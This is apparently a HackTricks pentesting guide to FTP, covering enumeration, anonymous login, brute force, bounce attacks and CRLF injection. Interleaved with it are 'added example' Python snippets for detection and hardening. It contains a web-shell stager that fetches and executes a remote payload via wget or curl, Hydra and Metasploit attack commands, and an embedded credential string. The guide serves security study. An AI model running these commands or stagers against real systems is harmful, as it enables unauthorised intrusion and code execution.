21 - Pentesting FTP

Tip

Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Basic Information

File Transfer Protocol (FTP) serves as a standard protocol for transferring files across a computer network between a server and a client.
It is a plain-text protocol that uses 0x0d 0x0a as its new-line sequence, so sometimes you need to connect using telnet or nc -C.

Default port: 21

PORT   STATE SERVICE
21/tcp open  ftp

Active & Passive Connections

In Active FTP the FTP client first initiates the control connection from its port N to the FTP server's command port, port 21. The client then listens on port N+1 and sends the port N+1 to the FTP server. The FTP server then initiates the data connection, from its port M to port N+1 of the FTP client.

However, if the FTP client has a firewall set up that controls incoming data connections from outside, then Active FTP may be a problem. A feasible solution for that is Passive FTP.

In Passive FTP, the client initiates the control connection from its port N to port 21 of the FTP server. After this, the client issues a PASV command. The server then sends the client one of its port numbers M, and the client initiates the data connection from its port P to port M of the FTP server.

Source: https://www.thesecuritybuddy.com/vulnerabilities/what-is-ftp-bounce-attack/

Checking the Connection

The FTP debug and trace commands can be used to see how the communication is taking place.

Enumeration

nc -vn <IP> 21
openssl s_client -connect crossfit.htb:21 -starttls ftp #Get certificate if any

Connect to FTP using starttls

lftp
lftp :~> set ftp:ssl-force true
lftp :~> set ssl:verify-certificate no
lftp :~> connect 10.10.10.208
lftp 10.10.10.208:~> login
Usage: login <user|URL> [<pass>]
lftp 10.10.10.208:~> login username Password

Unauth enum

Using nmap

sudo nmap -sV -p21 -sC -A 10.10.10.10

You can use the HELP and FEAT commands to obtain some information about the FTP server:

HELP
214-The following commands are recognized (* =>'s unimplemented):
214-CWD     XCWD    CDUP    XCUP    SMNT*   QUIT    PORT    PASV
214-EPRT    EPSV    ALLO*   RNFR    RNTO    DELE    MDTM    RMD
214-XRMD    MKD     XMKD    PWD     XPWD    SIZE    SYST    HELP
214-NOOP    FEAT    OPTS    AUTH    CCC*    CONF*   ENC*    MIC*
214-PBSZ    PROT    TYPE    STRU    MODE    RETR    STOR    STOU
214-APPE    REST    ABOR    USER    PASS    ACCT*   REIN*   LIST
214-NLST    STAT    SITE    MLSD    MLST
214 Direct comments to root@drei.work

FEAT
211-Features:
PROT
CCC
PBSZ
AUTH TLS
MFF modify;UNIX.group;UNIX.mode;
REST STREAM
MLST modify*;perm*;size*;type*;unique*;UNIX.group*;UNIX.mode*;UNIX.owner*;
UTF8
EPRT
EPSV
LANG en-US
MDTM
SSCN
TVFS
MFMT
SIZE
211 End

STAT
#Info about the FTP server (version, configs, status...)

Anonymous login

anonymous : anonymous
_anonymous :
_ftp : ftp

ftp <IP>
>anonymous
>anonymous
>ls -a # List all files (even hidden) (yes, they could be hidden)
>binary #Set transmission to binary instead of ascii
>ascii #Set transmission to ascii instead of binary
>bye #exit

Brute force

Here you can find a nice list of default ftp credentials: https://github.com/danielmiessler/SecLists/blob/master/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt

Automated

Anon login and bounce FTP checks are performed by default by nmap with the -sC option, or with:

nmap --script ftp-* -p 21 <ip>

Browser connection

You can connect to an FTP server using a browser (like Firefox) with a URL such as:

ftp://anonymous:anonymous@10.10.10.98

Note that if a web application sends user-controlled data directly to an FTP server, you can send double URL-encoded %0d%0a bytes (in double URL encoding this is %250d%250a) and make the FTP server perform arbitrary actions. One of the possible arbitrary actions is to download content from a user-controlled server, perform port scanning, or try to talk to other plain-text services (like http).
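As an added example (not code from the page), this Python shows the check a web application should apply to user-controlled data before forwarding it to an FTP server: decoding is repeated until the value stops changing, so the double-encoded %250d%250a form is caught where a single decode would miss it. Function names and sample inputs are my own.

```python
from urllib.parse import unquote

# Characters that end or alter an FTP command line (CR, LF) plus NUL.
FTP_LINE_BREAKERS = {"\r", "\n", "\x00"}

def fully_decode(value, max_rounds=5):
    """Undo nested percent-encoding until the string stops changing,
    so %250d%250a is seen as the CR LF it becomes after two decodes."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            return value
        value = decoded
    return value

def has_ftp_line_injection(value):
    """True if the user-supplied value would inject a new FTP command line."""
    return any(ch in FTP_LINE_BREAKERS for ch in fully_decode(value))

def safe_ftp_argument(value):
    """Validate a user-controlled filename before it is placed in an FTP
    command; rejects anything that decodes to control characters."""
    decoded = fully_decode(value)
    if not decoded.isprintable():
        raise ValueError("refusing to forward control characters to the FTP server")
    return decoded

# Constructed inputs: a benign filename, then a single- and a double-encoded CRLF.
SAMPLES = {
    "report.txt": False,
    "report.txt%0d%0aDELE%20other.txt": True,
    "report.txt%250d%250aDELE%20other.txt": True,
}
```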

Download all files from the FTP

wget -m ftp://anonymous:anonymous@10.10.10.98 #Download all
wget -m --no-passive ftp://anonymous:anonymous@10.10.10.98 #Download all

If your user/password contains special characters, the following command can be used:

wget -r --user="USERNAME" --password="PASSWORD" ftp://server.com/

FTP root mounted on the webroot (XAMPP)

  • XAMPP/ProFTPD often places the FTP root at /opt/lampp/htdocs, so weak credentials for service accounts such as daemon or nobody can let you upload a PHP web shell directly into the served webroot.
  • After upload, trigger an architecture-aware download/exec stager via the shell, for example: webshell.php?dmc=(wget -qO - http://<compromised_host_ip>/.x/?x=x86 || curl http://<compromised_host_ip>/.x/?x=x86), which fetches a checksum-verified payload, saves it (e.g. as init_start), marks it chmod +x, and executes it.
  • If the current directory is not writable/executable, the stager falls back to /tmp, so test web paths and filesystem permissions after upload.

Some FTP commands

  • USER username
  • PASS password
  • HELP The server indicates which commands are supported
  • PORT 127,0,0,1,0,80 This will instruct the FTP server to establish a connection with the IP 127.0.0.1 on port 80 (you need to set the fifth field to "0" and the sixth to the port number in decimal, or use the fifth and sixth fields to express the port in hex).
  • EPRT |2|127.0.0.1|80| This will instruct the FTP server to establish a TCP connection (indicated by "2") with the IP 127.0.0.1 on port 80. This command supports IPv6.
  • LIST This will send the list of files in the current folder
  • LIST -R List recursively (if allowed by the server)
  • APPE /path/something.txt This will instruct the FTP server to store the data received from a passive connection or from a PORT/EPRT connection into a file. If the filename already exists, it will append the data.
  • STOR /path/something.txt Like APPE but it will overwrite the file
  • STOU /path/something.txt Like APPE, but if the file exists, it won't do anything.
  • RETR /path/to/file A passive or port connection must be established first. Then, the FTP server will send the indicated file through that connection
  • REST 6 This will instruct the server that the next time it uses RETR it should start from the 6th byte.
  • TYPE i Set transfer to binary
  • PASV This will open a passive connection and indicate to the user where to connect
  • PUT /tmp/file.txt Upload the indicated file to the FTP

FTPBounce attack

Some FTP servers allow the PORT command. This command can be used to indicate to the server that you want to connect to another FTP server on some port. Then, you can use this to scan which ports of a host are open through the FTP server.

Learn here how to abuse a FTP server to scan ports.

You could also abuse this behaviour to make the FTP server interact with other protocols. You could upload a file containing an HTTP request and make the vulnerable FTP server send it to an arbitrary HTTP server (maybe to add a new admin user?), or even upload an FTP request and make the vulnerable FTP server download a file from a different FTP server.
The theory is easy:

  1. Upload the request (inside a text file) to the vulnerable server. Remember that if you want to talk with another HTTP or FTP server you need to change lines with 0x0d 0x0a
  2. Use REST X to avoid sending the characters you don't want to send (maybe to upload the request inside the file you needed to put some image header at the beginning)
  3. Use PORT to connect to the arbitrary server and service
  4. Use RETR to send the saved request to the server.

It's highly probable that this will throw an error like Socket not writable because the connection doesn't last long enough to send the data with RETR. Suggestions to try to avoid that are:

  • If you are sending an HTTP request, put the same request one after another until at least ~0.5MB. Like this:

  • Try to fill the request with "junk" data relevant to the protocol (talking to FTP maybe just junk commands or repeating the RETR instruction to get the file)
  • Or just fill the request with a lot of null characters or others (divided across lines or not)

Anyway, here you have an old example about how to abuse this to make a FTP server download a file from a different FTP server.
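As an added example (not part of the original page), the following Python parses the PORT and EPRT arguments described in the command list above, using the h1,h2,h3,h4,p1,p2 encoding with port = p1*256 + p2, and flags any data-connection request whose target is not the client itself, which is what an FTP bounce looks like from the server side. The log format, the sample lines and the function names are constructed here; EPRT protocol numbers follow RFC 2428 (1 = IPv4, 2 = IPv6).

```python
import ipaddress
import re

# Constructed sample of FTP control-channel commands as a server-side log
# might record them: "<client_ip> <command line>". Not from any real host.
SAMPLE_LOG = """\
10.10.14.5 USER anonymous
10.10.14.5 PASS anonymous
10.10.14.5 PORT 10,10,14,5,195,80
10.10.14.5 PORT 127,0,0,1,0,80
10.10.14.5 EPRT |1|10.10.10.98|8080|
10.10.14.5 RETR request.txt
"""

def parse_port_arg(arg):
    """PORT h1,h2,h3,h4,p1,p2 -> (ip, port); the port is p1*256 + p2."""
    fields = arg.split(",")
    if len(fields) != 6:
        raise ValueError("PORT needs exactly 6 comma-separated fields")
    nums = [int(f) for f in fields]
    if any(n < 0 or n > 255 for n in nums):
        raise ValueError("every PORT field must be in 0..255")
    return ".".join(str(n) for n in nums[:4]), nums[4] * 256 + nums[5]

def parse_eprt_arg(arg):
    """EPRT |proto|addr|port| -> (addr, port). RFC 2428: proto 1 = IPv4, 2 = IPv6."""
    m = re.fullmatch(r"\|([12])\|([^|]+)\|(\d{1,5})\|", arg)
    if not m:
        raise ValueError("malformed EPRT argument")
    return m.group(2), int(m.group(3))

def detect_bounce(log_text):
    """Return (client, target_ip, target_port) for every PORT/EPRT whose
    target is not the client itself: the pattern of an FTP bounce."""
    findings = []
    for line in log_text.splitlines():
        client, _, cmdline = line.partition(" ")
        verb, _, arg = cmdline.partition(" ")
        verb = verb.upper()
        if verb == "PORT":
            target_ip, target_port = parse_port_arg(arg)
        elif verb == "EPRT":
            target_ip, target_port = parse_eprt_arg(arg)
        else:
            continue
        if ipaddress.ip_address(target_ip) != ipaddress.ip_address(client):
            findings.append((client, target_ip, target_port))
    return findings
```

The same check can be applied to a server's own deny list by comparing the target against the control-connection peer address, which is exactly the mitigation most FTP daemons implement when they refuse third-party PORT targets.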

FileZilla Server Vulnerability

FileZilla usually binds locally an Administrative Service for the FileZilla-Server (port 14147). If you can create a tunnel from your machine to reach this port, you can connect to it with a blank password and create a new user for the FTP Service.

Config files

ftpusers
ftp.conf
proftpd.conf
vsftpd.conf

Post-Exploitation

The default configuration of vsFTPd can be found in /etc/vsftpd.conf. Here, you could find some dangerous settings:

  • anonymous_enable=YES
  • anon_upload_enable=YES
  • anon_mkdir_write_enable=YES
  • anon_root=/home/username/ftp - Directory for anonymous users.
  • chown_uploads=YES - Change ownership of anonymously uploaded files
  • chown_username=username - User who is given ownership of anonymously uploaded files
  • local_enable=YES - Enable local users to log in
  • no_anon_password=YES - Do not ask anonymous users for a password
  • write_enable=YES - Allow the commands: STOR, DELE, RNFR, RNTO, MKD, RMD, APPE, and SITE
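Added example, not from the page: a small Python audit that parses a vsftpd.conf and reports the risky options listed above. It assumes the upstream defaults documented in the vsftpd.conf man page (anonymous_enable is YES when the line is absent, the other options NO); the sample configuration and function names are constructed.

```python
# Constructed sample of a vsftpd.conf (not taken from any real host).
SAMPLE_CONF = """\
# vsftpd configuration (constructed sample)
anonymous_enable=YES
no_anon_password=YES
anon_root=/var/ftp
anon_upload_enable=YES
anon_mkdir_write_enable=NO
local_enable=YES
write_enable=YES
chown_uploads=YES
chown_username=root
"""

# Upstream defaults when an option is missing (vsftpd.conf man page);
# note that anonymous access is ON unless explicitly disabled.
DEFAULTS = {"anonymous_enable": "YES"}

def parse_vsftpd_conf(text):
    """Read key=value lines the way vsftpd does: blank lines and '#' comments are ignored."""
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        conf[key.strip()] = value.strip()
    return conf

def is_yes(conf, key):
    """vsftpd boolean options are case-insensitive YES/NO."""
    return conf.get(key, DEFAULTS.get(key, "NO")).upper() == "YES"

def audit_vsftpd(conf):
    """Return (severity, option, reason) for the risky options listed above."""
    findings = []
    anon = is_yes(conf, "anonymous_enable")
    writable = is_yes(conf, "write_enable")
    if anon:
        findings.append(("medium", "anonymous_enable",
                         "anonymous login allowed, root " + conf.get("anon_root", "<default>")))
        if is_yes(conf, "no_anon_password"):
            findings.append(("low", "no_anon_password", "anonymous users are not asked for a password"))
    if writable:
        findings.append(("high" if anon else "medium", "write_enable",
                         "STOR/DELE/RNFR/RNTO/MKD/RMD/APPE/SITE are enabled"))
    for opt in ("anon_upload_enable", "anon_mkdir_write_enable"):
        if anon and writable and is_yes(conf, opt):
            findings.append(("high", opt, "unauthenticated users can write into the FTP tree"))
    if is_yes(conf, "chown_uploads"):
        findings.append(("medium", "chown_uploads",
                         "anonymous uploads become owned by " + conf.get("chown_username", "root")))
    return findings
```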

Shodan

  • ftp
  • port:21

HackTricks Automatic Commands

Protocol_Name: FTP    #Protocol Abbreviation if there is one.
Port_Number:  21     #Comma separated if there is more than one.
Protocol_Description: File Transfer Protocol          #Protocol Abbreviation Spelled out

Entry_1:
Name: Notes
Description: Notes for FTP
Note: |
Anonymous Login
-bi     <<< so that your put is done via binary

wget --mirror 'ftp://ftp_user:UTDRSCH53c"$6hys@10.10.10.59'
^^to download all dirs and files

wget --no-passive-ftp --mirror 'ftp://anonymous:anonymous@10.10.10.98'
if PASV transfer is disabled

https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-ftp/index.html

Entry_2:
Name: Banner Grab
Description: Grab FTP Banner via telnet
Command: telnet -n {IP} 21

Entry_3:
Name: Cert Grab
Description: Grab FTP Certificate if existing
Command: openssl s_client -connect {IP}:21 -starttls ftp

Entry_4:
Name: nmap ftp
Description: Anon login and bounce FTP checks are performed
Command: nmap --script ftp-* -p 21 {IP}

Entry_5:
Name: Browser Connection
Description: Connect with Browser
Note: ftp://anonymous:anonymous@{IP}

Entry_6:
Name: Hydra Brute Force
Description: Need Username
Command: hydra -t 1 -l {Username} -P {Big_Passwordlist} -vV {IP} ftp

Entry_7:
Name: consolesless mfs enumeration ftp
Description: FTP enumeration without the need to run msfconsole
Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/ftp/anonymous; set RHOSTS {IP}; set RPORT 21; run; exit' && msfconsole -q -x 'use auxiliary/scanner/ftp/ftp_version; set RHOSTS {IP}; set RPORT 21; run; exit' && msfconsole -q -x 'use auxiliary/scanner/ftp/bison_ftp_traversal; set RHOSTS {IP}; set RPORT 21; run; exit' && msfconsole -q -x 'use auxiliary/scanner/ftp/colorado_ftp_traversal; set RHOSTS {IP}; set RPORT 21; run; exit' &&  msfconsole -q -x 'use auxiliary/scanner/ftp/titanftp_xcrc_traversal; set RHOSTS {IP}; set RPORT 21; run; exit'
